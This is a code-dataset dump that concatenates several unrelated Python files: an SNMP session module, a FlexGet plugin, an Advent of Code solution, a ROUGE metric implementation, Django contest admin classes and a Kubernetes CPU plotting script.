except SystemError as exception_error:
# Update the error message
try_log_message = ("""\
{}: [{}, {}, {}]""".format(try_log_message, sys.exc_info()[0],
sys.exc_info()[1], sys.exc_info()[2]))
# Process easysnmp errors
(_contactable, exists) = _process_error(
try_log_message, exception_error,
check_reachability, check_existence, system_error=True)
except:
log_message = (
'Unexpected error: {}, {}, {}, {}'
''.format(
sys.exc_info()[0],
sys.exc_info()[1],
sys.exc_info()[2],
self._snmp_ip_target))
log.log2die(51029, log_message)
# Format results
values = _convert_results(results)
# Return
return (_contactable, exists, values)
class _Session():
"""Class to create an SNMP session with a target."""
def __init__(self, snmpvariable, context_name=''):
"""Initialize the class.
Args:
snmpvariable: SNMPVariable object
context_name: Name of context
Returns:
session: SNMP session
"""
# Initialize key variables
self._context_name = context_name
self._snmp_ip_target = snmpvariable.ip_target
self._snmp_port = snmpvariable.snmpauth.port
self._snmp_version = snmpvariable.snmpauth.version
self._snmp_community = snmpvariable.snmpauth.community
self._snmp_secname = snmpvariable.snmpauth.secname
self._snmp_authprotocol = snmpvariable.snmpauth.authprotocol
self._snmp_authpassword = snmpvariable.snmpauth.authpassword
self._snmp_privprotocol = snmpvariable.snmpauth.privprotocol
self._snmp_privpassword = snmpvariable.snmpauth.privpassword
# Fail if snmpvariable dictionary is empty
if self._snmp_version is None:
log_message = (
'SNMP version is "None". Non existent host? - {}'
''.format(self._snmp_ip_target))
log.log2die(51223, log_message)
# Fail if snmpvariable dictionary is empty
if bool(snmpvariable) is False:
log_message = ('SNMP parameters provided are blank. '
'Non existent host?')
log.log2die(51215, log_message)
# Fail if invalid snmpvariable
if isinstance(snmpvariable, SNMPVariable) is False:
log_message = ('Invalid SNMPVariable parameters')
log.log2die(51216, log_message)
# Create SNMP session
self.session = self._session()
def _session(self):
"""Create an SNMP session for queries.
Args:
None
Returns:
session: SNMP session
"""
# Create session
if self._snmp_version != 3:
session = easysnmp.Session(
community=self._snmp_community,
hostname=self._snmp_ip_target,
version=self._snmp_version,
remote_port=self._snmp_port,
use_numeric=True,
context=self._context_name
)
else:
session = easysnmp.Session(
hostname=self._snmp_ip_target,
version=self._snmp_version,
remote_port=self._snmp_port,
use_numeric=True,
context=self._context_name,
security_level=self._security_level(),
security_username=self._snmp_secname,
privacy_protocol=self._priv_protocol(),
privacy_password=self._snmp_privpassword,
auth_protocol=self._auth_protocol(),
auth_password=self._snmp_authpassword
)
# Return
return session
def _security_level(self):
"""Create string for security level.
Args:
snmp_params: Dict of SNMP paramerters
Returns:
result: security level
"""
# Determine the security level
if bool(self._snmp_authprotocol) is True:
if bool(self._snmp_privprotocol) is True:
result = 'authPriv'
else:
result = 'authNoPriv'
else:
result = 'noAuthNoPriv'
# Return
return result
def _auth_protocol(self):
"""Get AuthProtocol to use.
Args:
snmp_params: Dict of SNMP paramerters
Returns:
result: Protocol to be used in session
"""
# Initialize key variables
protocol = self._snmp_authprotocol
# Setup AuthProtocol (Default SHA)
if bool(protocol) is False:
result = 'DEFAULT'
else:
if protocol.lower() == 'md5':
result = 'MD5'
else:
result = 'SHA'
# Return
return result
def _priv_protocol(self):
"""Get privProtocol to use.
Args:
snmp_params: Dict of SNMP paramerters
Returns:
result: Protocol to be used in session
"""
# Initialize key variables
protocol = self._snmp_privprotocol
# Setup privProtocol (Default AES256)
if bool(protocol) is False:
result = 'DEFAULT'
else:
if protocol.lower() == 'des':
result = 'DES'
else:
result = 'AES'
# Return
return result
def _process_error(
log_message, exception_error, check_reachability,
check_existence, system_error=False):
"""Process the SNMP error.
Args:
params_dict: Dict of SNMP parameters to try
Returns:
alive: True if contactable
"""
# Initialize key varialbes
_contactable = True
exists = True
if system_error is False:
error_name = 'EasySNMPError'
else:
error_name = 'SystemError'
# Check existence of OID
if check_existence is True:
if system_error is False:
if isinstance(
exception_error,
easysnmp.exceptions.EasySNMPUnknownObjectIDError) is True:
exists = False
return (_contactable, exists)
elif isinstance(
exception_error,
easysnmp.exceptions.EasySNMPNoSuchNameError) is True:
exists = False
return (_contactable, exists)
elif isinstance(
exception_error,
easysnmp.exceptions.EasySNMPNoSuchObjectError) is True:
exists = False
return (_contactable, exists)
elif isinstance(
exception_error,
easysnmp.exceptions.EasySNMPNoSuchInstanceError) is True:
exists = False
return (_contactable, exists)
else:
exists = False
return (_contactable, exists)
# Checking if the target is reachable
if check_reachability is True:
_contactable = False
exists = False
return (_contactable, exists)
# Die an agonizing death!
log_message = ('{}: {}'.format(error_name, log_message))
log.log2die(51569, log_message)
return None
def _convert_results(inbound):
"""Convert results from easysnmp.variables.SNMPVariable to DataPoint.
Args:
inbound: SNMP query result as list of easysnmp.variables.SNMPVariable
Returns:
outbound: DataPoint formatted equivalent
"""
# Initialize key variables
outbound = []
# Format the results to DataPoint format
for item in inbound:
# Initialize loop variables
converted = None
snmp_type = item.snmp_type
data_type = DATA_INT
# Convert string type values to bytes
if snmp_type.upper() == 'OCTETSTR':
converted = item.value
data_type = DATA_STRING
elif snmp_type.upper() == 'OPAQUE':
converted = item.value
data_type = DATA_STRING
elif snmp_type.upper() == 'BITS':
converted = item.value
data_type = DATA_STRING
elif snmp_type.upper() == 'IPADDR':
converted = item.value
data_type = DATA_STRING
elif snmp_type.upper() == 'NETADDR':
converted = item.value
data_type = DATA_STRING
elif snmp_type.upper() == 'OBJECTID':
# DO NOT CHANGE !!!
# converted = bytes(str(value), 'utf-8')
converted = item.value
data_type = DATA_STRING
elif snmp_type.upper() == 'NOSUCHOBJECT':
# Nothing if OID not found
converted = None
data_type = DATA_NONE
elif snmp_type.upper() == 'NOSUCHINSTANCE':
# Nothing if OID not found
converted = None
data_type = DATA_NONE
elif snmp_type.upper() == 'ENDOFMIBVIEW':
# Nothing
converted = None
data_type = DATA_NONE
elif snmp_type.upper() == 'NULL':
# Nothing
converted = None
data_type = DATA_NONE
elif snmp_type.upper() == 'COUNTER':
# Numeric values
converted = int(item.value)
data_type = DATA_COUNT
elif snmp_type.upper() == 'COUNTER64':
# Numeric values
converted = int(item.value)
data_type = DATA_COUNT64
else:
# Convert everything else into integer values
# rfc1902.Integer
# rfc1902.Integer32
# rfc1902.Gauge32
# rfc1902.Unsigned32
# rfc1902.TimeTicks
converted = int(item.value)
# Convert result to DataPoint
key = '{}.{}'.format(item.oid, item.oid_index)
datapoint = DataPoint(key, converted, data_type=data_type)
# Append to outbound result
outbound.append(datapoint)
# Return
return outbound
| 31.314642 | 78 | 0.569389 | 15,086 | 0.750398 | 0 | 0 | 0 | 0 | 0 | 0 | 7,377 | 0.366942 |
0dd15e9fbd8b5095490c20bbe408b720a1df4284 | 76 | py | Python | nicos_mlz/resi/setups/resi.py | jkrueger1/nicos | 5f4ce66c312dedd78995f9d91e8a6e3c891b262b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 12 | 2019-11-06T15:40:36.000Z | 2022-01-01T16:23:00.000Z | nicos_mlz/resi/setups/resi.py | jkrueger1/nicos | 5f4ce66c312dedd78995f9d91e8a6e3c891b262b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 91 | 2020-08-18T09:20:26.000Z | 2022-02-01T11:07:14.000Z | nicos_mlz/resi/setups/resi.py | jkrueger1/nicos | 5f4ce66c312dedd78995f9d91e8a6e3c891b262b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 6 | 2020-01-11T10:52:30.000Z | 2022-02-25T12:35:23.000Z | description = 'Resi instrument setup'
group = 'basic'
includes = ['base']
| 12.666667 | 37 | 0.684211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 36 | 0.473684 |
0dd1930770aea04bae379563241478aca2d4c7fe | 643 | py | Python | flexget/plugins/metainfo/torrent_size.py | Crupuk/Flexget | 0ede246fd4b90e3cd75120ba13746187e11968d2 | [
"MIT"
] | null | null | null | flexget/plugins/metainfo/torrent_size.py | Crupuk/Flexget | 0ede246fd4b90e3cd75120ba13746187e11968d2 | [
"MIT"
] | null | null | null | flexget/plugins/metainfo/torrent_size.py | Crupuk/Flexget | 0ede246fd4b90e3cd75120ba13746187e11968d2 | [
"MIT"
] | null | null | null | from __future__ import unicode_literals, division, absolute_import
import logging
from flexget.plugin import priority, register_plugin
log = logging.getLogger('torrent_size')
class TorrentSize(object):
"""
Provides file size information when dealing with torrents
"""
@priority(200)
def on_task_modify(self, task):
for entry in task.entries:
if 'torrent' in entry:
size = entry['torrent'].size / 1024 / 1024
log.debug('%s size: %s MB' % (entry['title'], size))
entry['content_size'] = size
register_plugin(TorrentSize, 'torrent_size', builtin=True)
| 27.956522 | 68 | 0.656299 | 403 | 0.62675 | 0 | 0 | 293 | 0.455677 | 0 | 0 | 156 | 0.242613 |
0dd2555afdd3a6cef51e80f367899168ecaad20e | 724 | py | Python | day23.py | ednl/aoc2015 | 0cce9ca34c4218f063b1c6eed92477b47558cf5b | [
"MIT"
] | null | null | null | day23.py | ednl/aoc2015 | 0cce9ca34c4218f063b1c6eed92477b47558cf5b | [
"MIT"
] | null | null | null | day23.py | ednl/aoc2015 | 0cce9ca34c4218f063b1c6eed92477b47558cf5b | [
"MIT"
] | null | null | null | import re
cmd = re.compile(r'^(\w+) (\w)?(?:, )?((?:\+|-)\d+)?$')
with open('input23.txt') as f:
# Subtract 1 from jump (offset) to enable ip++ for every instruction
mem = [(i, r, j if j is None else int(j) - 1) for s in f for i, r, j in [cmd.match(s.strip()).groups()]]
def run(a: int) -> int:
reg = {'a': a, 'b': 0}
ip = 0
while ip >= 0 and ip < len(mem):
i, r, j = mem[ip]
if i == 'inc':
reg[r] += 1
elif i == 'hlf':
reg[r] //= 2
elif i == 'tpl':
reg[r] *= 3
elif i == 'jmp' or (i == 'jie' and reg[r] % 2 == 0) or (i == 'jio' and reg[r] == 1):
ip += j
ip += 1
return reg['b']
print(run(0), run(1))
| 28.96 | 108 | 0.426796 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 157 | 0.216851 |
0dd32e9ca2c7ce0add00ea94a0758f176b038de9 | 27,038 | py | Python | src/summarization/metric/rouge_metric.py | youngerous/kobart-voice-summarization | bf48edea602c0661d638f0ed6f4a35c2ced4009f | [
"Apache-2.0"
] | 8 | 2021-05-16T05:40:29.000Z | 2022-03-14T08:32:54.000Z | src/summarization/metric/rouge_metric.py | youngerous/kobart-voice-summarization | bf48edea602c0661d638f0ed6f4a35c2ced4009f | [
"Apache-2.0"
] | null | null | null | src/summarization/metric/rouge_metric.py | youngerous/kobart-voice-summarization | bf48edea602c0661d638f0ed6f4a35c2ced4009f | [
"Apache-2.0"
] | 3 | 2021-08-09T08:06:24.000Z | 2021-11-29T05:04:56.000Z | """
Ref: https://dacon.io/competitions/official/235673/talkboard/401911?page=1&dtype=recent
"""
import os
import re
import platform
import itertools
import collections
import pkg_resources # pip install py-rouge
from io import open
if platform.system() == "Windows":
try:
from eunjeon import Mecab
except:
print("please install eunjeon module")
else: # Ubuntu일 경우
from konlpy.tag import Mecab
class Rouge:
DEFAULT_METRICS = {"rouge-n"}
DEFAULT_N = 1
STATS = ["f", "p", "r"]
AVAILABLE_METRICS = {"rouge-n", "rouge-l", "rouge-w"}
AVAILABLE_LENGTH_LIMIT_TYPES = {"words", "bytes"}
REMOVE_CHAR_PATTERN = re.compile("[^A-Za-z0-9가-힣]")
def __init__(
self,
metrics=None,
max_n=None,
limit_length=True,
length_limit=1000,
length_limit_type="words",
apply_avg=True,
apply_best=False,
use_tokenizer=True,
alpha=0.5,
weight_factor=1.0,
):
self.metrics = metrics[:] if metrics is not None else Rouge.DEFAULT_METRICS
for m in self.metrics:
if m not in Rouge.AVAILABLE_METRICS:
raise ValueError("Unknown metric '{}'".format(m))
self.max_n = max_n if "rouge-n" in self.metrics else None
# Add all rouge-n metrics
if self.max_n is not None:
index_rouge_n = self.metrics.index("rouge-n")
del self.metrics[index_rouge_n]
self.metrics += ["rouge-{}".format(n) for n in range(1, self.max_n + 1)]
self.metrics = set(self.metrics)
self.limit_length = limit_length
if self.limit_length:
if length_limit_type not in Rouge.AVAILABLE_LENGTH_LIMIT_TYPES:
raise ValueError(
"Unknown length_limit_type '{}'".format(length_limit_type)
)
self.length_limit = length_limit
if self.length_limit == 0:
self.limit_length = False
self.length_limit_type = length_limit_type
self.use_tokenizer = use_tokenizer
if use_tokenizer:
self.tokenizer = Mecab()
self.apply_avg = apply_avg
self.apply_best = apply_best
self.alpha = alpha
self.weight_factor = weight_factor
if self.weight_factor <= 0:
raise ValueError("ROUGE-W weight factor must greater than 0.")
def tokenize_text(self, text):
if self.use_tokenizer:
return self.tokenizer.morphs(text)
else:
return text
@staticmethod
def split_into_sentences(text):
return text.split("\n")
@staticmethod
def _get_ngrams(n, text):
ngram_set = collections.defaultdict(int)
max_index_ngram_start = len(text) - n
for i in range(max_index_ngram_start + 1):
ngram_set[tuple(text[i : i + n])] += 1
return ngram_set
@staticmethod
def _split_into_words(sentences):
return list(itertools.chain(*[_.split() for _ in sentences]))
@staticmethod
def _get_word_ngrams_and_length(n, sentences):
assert len(sentences) > 0
assert n > 0
tokens = Rouge._split_into_words(sentences)
return Rouge._get_ngrams(n, tokens), tokens, len(tokens) - (n - 1)
@staticmethod
def _get_unigrams(sentences):
assert len(sentences) > 0
tokens = Rouge._split_into_words(sentences)
unigram_set = collections.defaultdict(int)
for token in tokens:
unigram_set[token] += 1
return unigram_set, len(tokens)
@staticmethod
def _compute_p_r_f_score(
evaluated_count,
reference_count,
overlapping_count,
alpha=0.5,
weight_factor=1.0,
):
precision = (
0.0 if evaluated_count == 0 else overlapping_count / float(evaluated_count)
)
if weight_factor != 1.0:
precision = precision ** (1.0 / weight_factor)
recall = (
0.0 if reference_count == 0 else overlapping_count / float(reference_count)
)
if weight_factor != 1.0:
recall = recall ** (1.0 / weight_factor)
f1_score = Rouge._compute_f_score(precision, recall, alpha)
return {"f": f1_score, "p": precision, "r": recall}
@staticmethod
def _compute_f_score(precision, recall, alpha=0.5):
return (
0.0
if (recall == 0.0 or precision == 0.0)
else precision * recall / ((1 - alpha) * precision + alpha * recall)
)
@staticmethod
def _compute_ngrams(evaluated_sentences, reference_sentences, n):
if len(evaluated_sentences) <= 0 or len(reference_sentences) <= 0:
raise ValueError("Collections must contain at least 1 sentence.")
evaluated_ngrams, _, evaluated_count = Rouge._get_word_ngrams_and_length(
n, evaluated_sentences
)
reference_ngrams, _, reference_count = Rouge._get_word_ngrams_and_length(
n, reference_sentences
)
# Gets the overlapping ngrams between evaluated and reference
overlapping_ngrams = set(evaluated_ngrams.keys()).intersection(
set(reference_ngrams.keys())
)
overlapping_count = 0
for ngram in overlapping_ngrams:
overlapping_count += min(evaluated_ngrams[ngram], reference_ngrams[ngram])
return evaluated_count, reference_count, overlapping_count
@staticmethod
def _compute_ngrams_lcs(
evaluated_sentences, reference_sentences, weight_factor=1.0
):
def _lcs(x, y):
m = len(x)
n = len(y)
vals = collections.defaultdict(int)
dirs = collections.defaultdict(int)
for i in range(1, m + 1):
for j in range(1, n + 1):
if x[i - 1] == y[j - 1]:
vals[i, j] = vals[i - 1, j - 1] + 1
dirs[i, j] = "|"
elif vals[i - 1, j] >= vals[i, j - 1]:
vals[i, j] = vals[i - 1, j]
dirs[i, j] = "^"
else:
vals[i, j] = vals[i, j - 1]
dirs[i, j] = "<"
return vals, dirs
def _wlcs(x, y, weight_factor):
m = len(x)
n = len(y)
vals = collections.defaultdict(float)
dirs = collections.defaultdict(int)
lengths = collections.defaultdict(int)
for i in range(1, m + 1):
for j in range(1, n + 1):
if x[i - 1] == y[j - 1]:
length_tmp = lengths[i - 1, j - 1]
vals[i, j] = (
vals[i - 1, j - 1]
+ (length_tmp + 1) ** weight_factor
- length_tmp ** weight_factor
)
dirs[i, j] = "|"
lengths[i, j] = length_tmp + 1
elif vals[i - 1, j] >= vals[i, j - 1]:
vals[i, j] = vals[i - 1, j]
dirs[i, j] = "^"
lengths[i, j] = 0
else:
vals[i, j] = vals[i, j - 1]
dirs[i, j] = "<"
lengths[i, j] = 0
return vals, dirs
def _mark_lcs(mask, dirs, m, n):
while m != 0 and n != 0:
if dirs[m, n] == "|":
m -= 1
n -= 1
mask[m] = 1
elif dirs[m, n] == "^":
m -= 1
elif dirs[m, n] == "<":
n -= 1
else:
raise UnboundLocalError("Illegal move")
return mask
if len(evaluated_sentences) <= 0 or len(reference_sentences) <= 0:
raise ValueError("Collections must contain at least 1 sentence.")
evaluated_unigrams_dict, evaluated_count = Rouge._get_unigrams(
evaluated_sentences
)
reference_unigrams_dict, reference_count = Rouge._get_unigrams(
reference_sentences
)
# Has to use weight factor for WLCS
use_WLCS = weight_factor != 1.0
if use_WLCS:
evaluated_count = evaluated_count ** weight_factor
reference_count = 0
overlapping_count = 0.0
for reference_sentence in reference_sentences:
reference_sentence_tokens = reference_sentence.split()
if use_WLCS:
reference_count += len(reference_sentence_tokens) ** weight_factor
hit_mask = [0 for _ in range(len(reference_sentence_tokens))]
for evaluated_sentence in evaluated_sentences:
evaluated_sentence_tokens = evaluated_sentence.split()
if use_WLCS:
_, lcs_dirs = _wlcs(
reference_sentence_tokens,
evaluated_sentence_tokens,
weight_factor,
)
else:
_, lcs_dirs = _lcs(
reference_sentence_tokens, evaluated_sentence_tokens
)
_mark_lcs(
hit_mask,
lcs_dirs,
len(reference_sentence_tokens),
len(evaluated_sentence_tokens),
)
overlapping_count_length = 0
for ref_token_id, val in enumerate(hit_mask):
if val == 1:
token = reference_sentence_tokens[ref_token_id]
if (
evaluated_unigrams_dict[token] > 0
and reference_unigrams_dict[token] > 0
):
evaluated_unigrams_dict[token] -= 1
reference_unigrams_dict[ref_token_id] -= 1
if use_WLCS:
overlapping_count_length += 1
if (
ref_token_id + 1 < len(hit_mask)
and hit_mask[ref_token_id + 1] == 0
) or ref_token_id + 1 == len(hit_mask):
overlapping_count += (
overlapping_count_length ** weight_factor
)
overlapping_count_length = 0
else:
overlapping_count += 1
if use_WLCS:
reference_count = reference_count ** weight_factor
return evaluated_count, reference_count, overlapping_count
def get_scores(self, hypothesis, references):
if isinstance(hypothesis, str):
hypothesis, references = [hypothesis], [references]
if type(hypothesis) != type(references):
raise ValueError("'hyps' and 'refs' are not of the same type")
if len(hypothesis) != len(references):
raise ValueError("'hyps' and 'refs' do not have the same length")
scores = {}
has_rouge_n_metric = (
len([metric for metric in self.metrics if metric.split("-")[-1].isdigit()])
> 0
)
if has_rouge_n_metric:
scores.update(self._get_scores_rouge_n(hypothesis, references))
# scores = {**scores, **self._get_scores_rouge_n(hypothesis, references)}
has_rouge_l_metric = (
len(
[
metric
for metric in self.metrics
if metric.split("-")[-1].lower() == "l"
]
)
> 0
)
if has_rouge_l_metric:
scores.update(self._get_scores_rouge_l_or_w(hypothesis, references, False))
# scores = {**scores, **self._get_scores_rouge_l_or_w(hypothesis, references, False)}
has_rouge_w_metric = (
len(
[
metric
for metric in self.metrics
if metric.split("-")[-1].lower() == "w"
]
)
> 0
)
if has_rouge_w_metric:
scores.update(self._get_scores_rouge_l_or_w(hypothesis, references, True))
# scores = {**scores, **self._get_scores_rouge_l_or_w(hypothesis, references, True)}
return scores
def _get_scores_rouge_n(self, all_hypothesis, all_references):
metrics = [metric for metric in self.metrics if metric.split("-")[-1].isdigit()]
if self.apply_avg or self.apply_best:
scores = {metric: {stat: 0.0 for stat in Rouge.STATS} for metric in metrics}
else:
scores = {
metric: [
{stat: [] for stat in Rouge.STATS}
for _ in range(len(all_hypothesis))
]
for metric in metrics
}
for sample_id, (hypothesis, references) in enumerate(
zip(all_hypothesis, all_references)
):
assert isinstance(hypothesis, str)
has_multiple_references = False
if isinstance(references, list):
has_multiple_references = len(references) > 1
if not has_multiple_references:
references = references[0]
# Prepare hypothesis and reference(s)
hypothesis = self._preprocess_summary_as_a_whole(hypothesis)
references = (
[
self._preprocess_summary_as_a_whole(reference)
for reference in references
]
if has_multiple_references
else [self._preprocess_summary_as_a_whole(references)]
)
# Compute scores
for metric in metrics:
suffix = metric.split("-")[-1]
n = int(suffix)
# Aggregate
if self.apply_avg:
# average model
total_hypothesis_ngrams_count = 0
total_reference_ngrams_count = 0
total_ngrams_overlapping_count = 0
for reference in references:
(
hypothesis_count,
reference_count,
overlapping_ngrams,
) = Rouge._compute_ngrams(hypothesis, reference, n)
total_hypothesis_ngrams_count += hypothesis_count
total_reference_ngrams_count += reference_count
total_ngrams_overlapping_count += overlapping_ngrams
score = Rouge._compute_p_r_f_score(
total_hypothesis_ngrams_count,
total_reference_ngrams_count,
total_ngrams_overlapping_count,
self.alpha,
)
for stat in Rouge.STATS:
scores[metric][stat] += score[stat]
else:
# Best model
if self.apply_best:
best_current_score = None
for reference in references:
(
hypothesis_count,
reference_count,
overlapping_ngrams,
) = Rouge._compute_ngrams(hypothesis, reference, n)
score = Rouge._compute_p_r_f_score(
hypothesis_count,
reference_count,
overlapping_ngrams,
self.alpha,
)
if (
best_current_score is None
or score["r"] > best_current_score["r"]
):
best_current_score = score
for stat in Rouge.STATS:
scores[metric][stat] += best_current_score[stat]
# Keep all
else:
for reference in references:
(
hypothesis_count,
reference_count,
overlapping_ngrams,
) = Rouge._compute_ngrams(hypothesis, reference, n)
score = Rouge._compute_p_r_f_score(
hypothesis_count,
reference_count,
overlapping_ngrams,
self.alpha,
)
for stat in Rouge.STATS:
scores[metric][sample_id][stat].append(score[stat])
# Compute final score with the average or the the max
if (self.apply_avg or self.apply_best) and len(all_hypothesis) > 1:
for metric in metrics:
for stat in Rouge.STATS:
scores[metric][stat] /= len(all_hypothesis)
return scores
def _get_scores_rouge_l_or_w(self, all_hypothesis, all_references, use_w=False):
metric = "rouge-w" if use_w else "rouge-l"
if self.apply_avg or self.apply_best:
scores = {metric: {stat: 0.0 for stat in Rouge.STATS}}
else:
scores = {
metric: [
{stat: [] for stat in Rouge.STATS}
for _ in range(len(all_hypothesis))
]
}
for sample_id, (hypothesis_sentences, references_sentences) in enumerate(
zip(all_hypothesis, all_references)
):
assert isinstance(hypothesis_sentences, str)
has_multiple_references = False
if isinstance(references_sentences, list):
has_multiple_references = len(references_sentences) > 1
if not has_multiple_references:
references_sentences = references_sentences[0]
# Prepare hypothesis and reference(s)
hypothesis_sentences = self._preprocess_summary_per_sentence(
hypothesis_sentences
)
references_sentences = (
[
self._preprocess_summary_per_sentence(reference)
for reference in references_sentences
]
if has_multiple_references
else [self._preprocess_summary_per_sentence(references_sentences)]
)
# Compute scores
# Aggregate
if self.apply_avg:
# average model
total_hypothesis_ngrams_count = 0
total_reference_ngrams_count = 0
total_ngrams_overlapping_count = 0
for reference_sentences in references_sentences:
(
hypothesis_count,
reference_count,
overlapping_ngrams,
) = Rouge._compute_ngrams_lcs(
hypothesis_sentences,
reference_sentences,
self.weight_factor if use_w else 1.0,
)
total_hypothesis_ngrams_count += hypothesis_count
total_reference_ngrams_count += reference_count
total_ngrams_overlapping_count += overlapping_ngrams
score = Rouge._compute_p_r_f_score(
total_hypothesis_ngrams_count,
total_reference_ngrams_count,
total_ngrams_overlapping_count,
self.alpha,
self.weight_factor if use_w else 1.0,
)
for stat in Rouge.STATS:
scores[metric][stat] += score[stat]
else:
# Best model
if self.apply_best:
best_current_score = None
best_current_score_wlcs = None
for reference_sentences in references_sentences:
(
hypothesis_count,
reference_count,
overlapping_ngrams,
) = Rouge._compute_ngrams_lcs(
hypothesis_sentences,
reference_sentences,
self.weight_factor if use_w else 1.0,
)
score = Rouge._compute_p_r_f_score(
total_hypothesis_ngrams_count,
total_reference_ngrams_count,
total_ngrams_overlapping_count,
self.alpha,
self.weight_factor if use_w else 1.0,
)
if use_w:
reference_count_for_score = reference_count ** (
1.0 / self.weight_factor
)
overlapping_ngrams_for_score = overlapping_ngrams
score_wlcs = (
overlapping_ngrams_for_score / reference_count_for_score
) ** (1.0 / self.weight_factor)
if (
best_current_score_wlcs is None
or score_wlcs > best_current_score_wlcs
):
best_current_score = score
best_current_score_wlcs = score_wlcs
else:
if (
best_current_score is None
or score["r"] > best_current_score["r"]
):
best_current_score = score
for stat in Rouge.STATS:
scores[metric][stat] += best_current_score[stat]
# Keep all
else:
for reference_sentences in references_sentences:
(
hypothesis_count,
reference_count,
overlapping_ngrams,
) = Rouge._compute_ngrams_lcs(
hypothesis_sentences,
reference_sentences,
self.weight_factor if use_w else 1.0,
)
score = Rouge._compute_p_r_f_score(
hypothesis_count,
reference_count,
overlapping_ngrams,
self.alpha,
self.weight_factor,
)
for stat in Rouge.STATS:
scores[metric][sample_id][stat].append(score[stat])
# Compute final score with the average or the the max
if (self.apply_avg or self.apply_best) and len(all_hypothesis) > 1:
for stat in Rouge.STATS:
scores[metric][stat] /= len(all_hypothesis)
return scores
def _preprocess_summary_as_a_whole(self, summary):
sentences = Rouge.split_into_sentences(summary)
# Truncate
if self.limit_length:
# By words
if self.length_limit_type == "words":
summary = " ".join(sentences)
all_tokens = summary.split() # Counting as in the perls script
summary = " ".join(all_tokens[: self.length_limit])
# By bytes
elif self.length_limit_type == "bytes":
summary = ""
current_len = 0
for sentence in sentences:
sentence = sentence.strip()
sentence_len = len(sentence)
if current_len + sentence_len < self.length_limit:
if current_len != 0:
summary += " "
summary += sentence
current_len += sentence_len
else:
if current_len > 0:
summary += " "
summary += sentence[: self.length_limit - current_len]
break
else:
summary = " ".join(sentences)
summary = Rouge.REMOVE_CHAR_PATTERN.sub(" ", summary.lower()).strip()
tokens = self.tokenize_text(Rouge.REMOVE_CHAR_PATTERN.sub(" ", summary))
preprocessed_summary = [" ".join(tokens)]
return preprocessed_summary
def _preprocess_summary_per_sentence(self, summary):
sentences = Rouge.split_into_sentences(summary)
# Truncate
if self.limit_length:
final_sentences = []
current_len = 0
# By words
if self.length_limit_type == "words":
for sentence in sentences:
tokens = sentence.strip().split()
tokens_len = len(tokens)
if current_len + tokens_len < self.length_limit:
sentence = " ".join(tokens)
final_sentences.append(sentence)
current_len += tokens_len
else:
sentence = " ".join(tokens[: self.length_limit - current_len])
final_sentences.append(sentence)
break
# By bytes
elif self.length_limit_type == "bytes":
for sentence in sentences:
sentence = sentence.strip()
sentence_len = len(sentence)
if current_len + sentence_len < self.length_limit:
final_sentences.append(sentence)
current_len += sentence_len
else:
sentence = sentence[: self.length_limit - current_len]
final_sentences.append(sentence)
break
sentences = final_sentences
final_sentences = []
for sentence in sentences:
sentence = Rouge.REMOVE_CHAR_PATTERN.sub(" ", sentence.lower()).strip()
tokens = self.tokenize_text(Rouge.REMOVE_CHAR_PATTERN.sub(" ", sentence))
sentence = " ".join(tokens)
final_sentences.append(sentence)
return final_sentences
| 38.625714 | 97 | 0.492529 | 26,614 | 0.983954 | 0 | 0 | 8,210 | 0.303534 | 0 | 0 | 1,510 | 0.055827 |
0dd358ad72eca9a8df86326685bf5bf8a52c322f | 717 | py | Python | algorithm_web/admin/contest.py | KMU-algolab/algorithm | 2b734978da78b936244580ed1febe4f9f6cf1aea | [
"MIT"
] | null | null | null | algorithm_web/admin/contest.py | KMU-algolab/algorithm | 2b734978da78b936244580ed1febe4f9f6cf1aea | [
"MIT"
] | 10 | 2019-03-15T05:12:23.000Z | 2020-05-06T13:05:49.000Z | algorithm_web/admin/contest.py | KMU-algolab/algorithm | 2b734978da78b936244580ed1febe4f9f6cf1aea | [
"MIT"
] | null | null | null | from django.contrib import admin
from .. import models
@admin.register(models.Contest)
class ContestAdmin(admin.ModelAdmin):
"""
대회관리
"""
list_display = ['contest_name', 'start_time', 'end_time', 'message', 'host_email', 'after_open']
class Meta:
model = models.Contest
@admin.register(models.ContestProblem)
class ContestProblemAdmin(admin.ModelAdmin):
"""
대회 문제관리
"""
list_display = ['contest', 'problem']
class Meta:
model = models.ContestProblem
@admin.register(models.Participant)
class ParticipantAdmin(admin.ModelAdmin):
"""
참가자관리
"""
list_display = ['contest', 'participant']
class Meta:
model = models.Participant
| 19.378378 | 100 | 0.658298 | 575 | 0.769746 | 0 | 0 | 682 | 0.912985 | 0 | 0 | 203 | 0.271754 |
0dd372748b3a10e7f2c3a966dab7085e18c12458 | 3,566 | py | Python | kubernetes_env/cpu_script.py | Kn99HN/tracing_env | 192d41d945aa1a642250ee1415a7a9babe7d2ba5 | [
"Apache-2.0"
] | null | null | null | kubernetes_env/cpu_script.py | Kn99HN/tracing_env | 192d41d945aa1a642250ee1415a7a9babe7d2ba5 | [
"Apache-2.0"
] | null | null | null | kubernetes_env/cpu_script.py | Kn99HN/tracing_env | 192d41d945aa1a642250ee1415a7a9babe7d2ba5 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
import seaborn as sns
import argparse
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import pathlib
import pathlib
import kube_env
import kube_util as util
def graph(title, csv_path, output):
old_to_new_names = {}
df = pd.read_csv(csv_path)
for col in df.columns:
if col != "Time":
start_pod_name = col.find("pod_name")
start_pod = col[start_pod_name:].find(":")+start_pod_name+1
end_pod = col[start_pod:].find(".")
pod_name = col[start_pod:start_pod+end_pod]
start_container_name = col.find("container_name")
start_container = col[start_container_name:].find(":")+start_container_name+1
end_container = col[start_container:].find(".")
container_name = col[start_container: start_container+end_container]
new_column_name = pod_name + "_" + container_name
old_to_new_names[col] = new_column_name
df.rename(columns=old_to_new_names, inplace=True)
df["Time"] = df["Time"].str[3:]
df["Time"] = df["Time"].str[:21]
df["Time"] = pd.to_datetime(df["Time"], infer_datetime_format=True)
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18, 6))
cols = []
for col in df.columns:
if col != "Time":
cols.append(col)
df[col] = df[col].replace("undefined", "nan")
df[col] = df[col].astype(float, errors='ignore')*1000 # change to milliseconds
dplt = sns.lineplot(data=df, x="Time", y=col, ax=ax1)
